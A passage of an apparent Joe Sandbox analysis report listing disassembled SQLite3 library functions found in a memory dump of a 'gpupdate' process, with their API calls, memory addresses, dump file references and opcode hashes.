                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: strncmp
                                              • String ID: #$-$]
                                              • API String ID: 1114863663-3149169660
                                              • Opcode ID: fd0ac7c6565e04bd3cddc9c74a022891e60a01dd31bd42b7649f9b0d7e7c797c
                                              • Instruction ID: d780d0f33c5adfd636f34eb4cc49aa29f228b3c1c83dfeac00bcda7d06f3bf8a
                                              • Opcode Fuzzy Hash: fd0ac7c6565e04bd3cddc9c74a022891e60a01dd31bd42b7649f9b0d7e7c797c
                                              • Instruction Fuzzy Hash: 09D1257090826A8FDB05CF98C48479DFBF1AF89308F29C15AD855AB352D335E946CF60
                                              Function 61E32694 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_malloc64.SQLITE3 ref: 61E32703
                                                • Part of subcall function 61E30C01: sqlite3_initialize.SQLITE3 ref: 61E30C0C
                                              • sqlite3_free.SQLITE3 ref: 61E3281A
                                              • sqlite3_result_error_code.SQLITE3 ref: 61E3293D
                                              • sqlite3_result_double.SQLITE3 ref: 61E32952
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_freesqlite3_initializesqlite3_malloc64sqlite3_result_doublesqlite3_result_error_code
                                              • String ID:
                                              • API String ID: 129515768-0
                                              • Opcode ID: 281c06534c1fd324bc636f2128c2822d189b404ad538db3e82893f0b62126564
                                              • Instruction ID: 667fabb4f4724597ba4ab06bcb53626033ea436d2d52a523303cf3e9f8d313f1
                                              • Opcode Fuzzy Hash: 281c06534c1fd324bc636f2128c2822d189b404ad538db3e82893f0b62126564
                                              • Instruction Fuzzy Hash: 8AA1F670A0461ADFCB01DF69C58468EBBF4FF88354F218829E899E7354EB30E955CB81
                                              Function 61E1ADCB Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                              • String ID:
                                              • API String ID: 2374424446-0
                                              • Opcode ID: 74afa7ae22cf43e994f47ffa5ec27e54aa26c9837cad7ac1ebfc4fb4dd6882bb
                                              • Instruction ID: d7c316987526d82b2e3feceebd463d67f4166c90d299659f7ceb0324328addfe
                                              • Opcode Fuzzy Hash: 74afa7ae22cf43e994f47ffa5ec27e54aa26c9837cad7ac1ebfc4fb4dd6882bb
                                              • Instruction Fuzzy Hash: 51514974D08399CFEB10CFA8C884B9DBBF1BF85308F108599D448AB295D7759A88CF52
                                              Function 61E3C2CF Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mprintf$sqlite3_freesqlite3_malloc64
                                              • String ID:
                                              • API String ID: 1717479056-0
                                              • Opcode ID: 553d00a67784c4caad64c489c7ab9b200e918b8b6ef85cd716c9c61536acd9d0
                                              • Instruction ID: b4b22cbe7295d8f15b15f145472d77849e85b9a24dc7ccee29dd8d388ee39ee1
                                              • Opcode Fuzzy Hash: 553d00a67784c4caad64c489c7ab9b200e918b8b6ef85cd716c9c61536acd9d0
                                              • Instruction Fuzzy Hash: B5414671A04225CFDB04DF68C48466ABBF1EFC8308F24C4AAEC559B345D775EA51CBA1
                                              Function 61E404FE Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_initialize.SQLITE3 ref: 61E4050A
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E4052C
                                              • sqlite3_vfs_find.SQLITE3 ref: 61E4056B
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E40688
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_vfs_find
                                              • String ID:
                                              • API String ID: 847843463-0
                                              • Opcode ID: e932cac3f0110d56b36025d3bdcc078fbb663ed3fd126af481ff25d56f6a8a95
                                              • Instruction ID: da880d0fa4cb3509374b31c909cc6412062fcf2969f0991eca3877981315857c
                                              • Opcode Fuzzy Hash: e932cac3f0110d56b36025d3bdcc078fbb663ed3fd126af481ff25d56f6a8a95
                                              • Instruction Fuzzy Hash: 1941B330C186E9DECB269B7996403D57FB0DF76704F2884D9CAD4CB362C234D9898B91
                                              Function 61E3A20D Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E3065B: sqlite3_malloc.SQLITE3 ref: 61E30688
                                              • sqlite3_free.SQLITE3 ref: 61E3A239
                                                • Part of subcall function 61E0A05C: sqlite3_mutex_enter.SQLITE3 ref: 61E0A07B
                                              • sqlite3_stricmp.SQLITE3 ref: 61E3A26C
                                              • sqlite3_free.SQLITE3 ref: 61E3A30C
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_entersqlite3_stricmp
                                              • String ID:
                                              • API String ID: 3567284914-0
                                              • Opcode ID: 46c330873c45653c3b9c495fa295cb2235c46bc51b85ce45983aa8392a926dff
                                              • Instruction ID: 6d583bb74454411b47b3a81cf3dba522584768d633448c77e7eb02afddc1a8be
                                              • Opcode Fuzzy Hash: 46c330873c45653c3b9c495fa295cb2235c46bc51b85ce45983aa8392a926dff
                                              • Instruction Fuzzy Hash: F431C574A4426A8FDB00DFA9C58469EBBF0BBC9708F248469D455E7320D736E882CB51
                                              Function 61E33D86 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_malloc64.SQLITE3 ref: 61E33DC6
                                                • Part of subcall function 61E30C01: sqlite3_initialize.SQLITE3 ref: 61E30C0C
                                              • sqlite3_value_dup.SQLITE3 ref: 61E33E19
                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E33E4E
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_initializesqlite3_malloc64sqlite3_result_error_nomemsqlite3_value_dup
                                              • String ID:
                                              • API String ID: 2961385374-0
                                              • Opcode ID: 50acbb042d2b9f9315ebd35a3b3b6003330f0085091b1b6a553056b121266d5d
                                              • Instruction ID: f9ee91dacdca626ae2f28b841342830c64bebae336667999da04049d7cadf231
                                              • Opcode Fuzzy Hash: 50acbb042d2b9f9315ebd35a3b3b6003330f0085091b1b6a553056b121266d5d
                                              • Instruction Fuzzy Hash: E331D775A042198FCB00DFA9C485A9EBBF1FF88314F15846AE948AB311D735E991CF91
                                              Function 61E20686 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                              • String ID:
                                              • API String ID: 3596987688-0
                                              • Opcode ID: 40d1f2cb4355a2badbbbd0a4c6adacc59dcac0c9036d35c7bace1bc1f40c17af
                                              • Instruction ID: 78e603f912d1f41b16e4f07db7708a85a984786fe3ee09f9c9336d50a8f48a4b
                                              • Opcode Fuzzy Hash: 40d1f2cb4355a2badbbbd0a4c6adacc59dcac0c9036d35c7bace1bc1f40c17af
                                              • Instruction Fuzzy Hash: FE3106B1A082459FCB04DF69C491A9EBBF0AF89324F24C52DE898DB395D734D841CF92
                                              Function 61E2DE70 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E2DEE6
                                              • sqlite3_snprintf.SQLITE3 ref: 61E2DF7E
                                              • sqlite3_snprintf.SQLITE3 ref: 61E2DF9E
                                              • sqlite3_free.SQLITE3 ref: 61E2DFA6
                                                • Part of subcall function 61E16D90: sqlite3_free.SQLITE3 ref: 61E16E36
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                              • String ID:
                                              • API String ID: 4082161338-0
                                              • Opcode ID: 46b677ffacb96736a5146eb626e3e6d680a0d882fb5524c0558611e7fa19db6c
                                              • Instruction ID: 474a668df178a1cb2f36a1c77974fa77420af7f09432702cb8c35fb95906bc00
                                              • Opcode Fuzzy Hash: 46b677ffacb96736a5146eb626e3e6d680a0d882fb5524c0558611e7fa19db6c
                                              • Instruction Fuzzy Hash: 2A31B1B49087469FEB00AFAAD49875EBBF4BF88748F20C81DE59897340D779C4458F92
                                              Function 61E27046 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_stricmp
                                              • String ID:
                                              • API String ID: 912767213-0
                                              • Opcode ID: e5f37aa4dc2105ee537c3ddbafa1045ac0e176b9275fca6f415fc04fcc516378
                                              • Instruction ID: 15687526654310887ba7439254dc9fe1223a538e1ce5926ca383d6784f1d9b16
                                              • Opcode Fuzzy Hash: e5f37aa4dc2105ee537c3ddbafa1045ac0e176b9275fca6f415fc04fcc516378
                                              • Instruction Fuzzy Hash: 4E217F74A097419BD7019FA5C595B1A7BE5AF9634CF38C86DEC898B301E738C848CB52
                                              Function 61E30768 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_malloc.SQLITE3 ref: 61E30782
                                                • Part of subcall function 61E2FCC8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E2F7C6), ref: 61E2FCD0
                                              • sqlite3_stricmp.SQLITE3 ref: 61E307CA
                                              • sqlite3_stricmp.SQLITE3 ref: 61E307F1
                                              • sqlite3_free.SQLITE3 ref: 61E3081F
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                              • String ID:
                                              • API String ID: 2308590742-0
                                              • Opcode ID: 3d625062fcd588869fa7f1884715be22553d4b96045dd8bd609517e7f967aa36
                                              • Instruction ID: 07fc84e5924bb0f0a7345fb65811dde2b96f17450111d1287d1c43f3496669b6
                                              • Opcode Fuzzy Hash: 3d625062fcd588869fa7f1884715be22553d4b96045dd8bd609517e7f967aa36
                                              • Instruction Fuzzy Hash: 2221C630A083A58BE7159EA9C58035BBBE6AFC5308F39C468CC84CB341D775D842C7D1
                                              Function 61E1F60A Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_stricmpsqlite3_value_text
                                              • String ID:
                                              • API String ID: 3779612131-0
                                              • Opcode ID: 89a65493b93207156b55a4b2c1ae0b36d1ea7c5a79b963c51b6ed9b4fb986a31
                                              • Instruction ID: 3d3999dea1f149566d6db8fa010b5a05161b48a64c9ae205412bb8532452eec3
                                              • Opcode Fuzzy Hash: 89a65493b93207156b55a4b2c1ae0b36d1ea7c5a79b963c51b6ed9b4fb986a31
                                              • Instruction Fuzzy Hash: EE1154B1A083499BC7109F69D885289BBA0FB44334F24CA2DE9648F394D735D5158BC1
                                              Function 61E20110 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E200B8
                                              • sqlite3_value_text16le.SQLITE3 ref: 61E200D0
                                              • sqlite3_value_text.SQLITE3 ref: 61E200DF
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E200FC
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_textsqlite3_value_text16le
                                              • String ID:
                                              • API String ID: 1617396527-0
                                              • Opcode ID: c430539437967f8a0b87c34356bb7a405c8ee44e7813e3f80614ae76059266d2
                                              • Instruction ID: 1931318618d3ae80715f30b3bef139f30204057d2c1b1bde483a5d4c74afb9c4
                                              • Opcode Fuzzy Hash: c430539437967f8a0b87c34356bb7a405c8ee44e7813e3f80614ae76059266d2
                                              • Instruction Fuzzy Hash: 32118274A487459FD704DF68C8E0B6ABBF5AB89314F25C42ED858C7390D778E541CB80
                                              Function 61E1EFC8 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_bytes$memmovesqlite3_aggregate_context
                                              • String ID:
                                              • API String ID: 1185593704-0
                                              • Opcode ID: 365ff7065cee6d0de40c83fd8868ca60bfce4c32764b95a0cce1ff34a31bcad8
                                              • Instruction ID: f75e241e0ef5810ffd93fe403c961d99e8f293789efa47de3012cafc6eb2b6a4
                                              • Opcode Fuzzy Hash: 365ff7065cee6d0de40c83fd8868ca60bfce4c32764b95a0cce1ff34a31bcad8
                                              • Instruction Fuzzy Hash: 851173B15087448FDB00DF69C489B0ABBE4FF84318F15C96DE8988B319D779D884CB91
                                              Function 61E3D714 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3D72C
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3D754
                                              • sqlite3_mprintf.SQLITE3 ref: 61E3D765
                                                • Part of subcall function 61E3A372: sqlite3_initialize.SQLITE3 ref: 61E3A378
                                                • Part of subcall function 61E3A372: sqlite3_vmprintf.SQLITE3 ref: 61E3A392
                                              • sqlite3_create_function_v2.SQLITE3 ref: 61E3D7AA
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
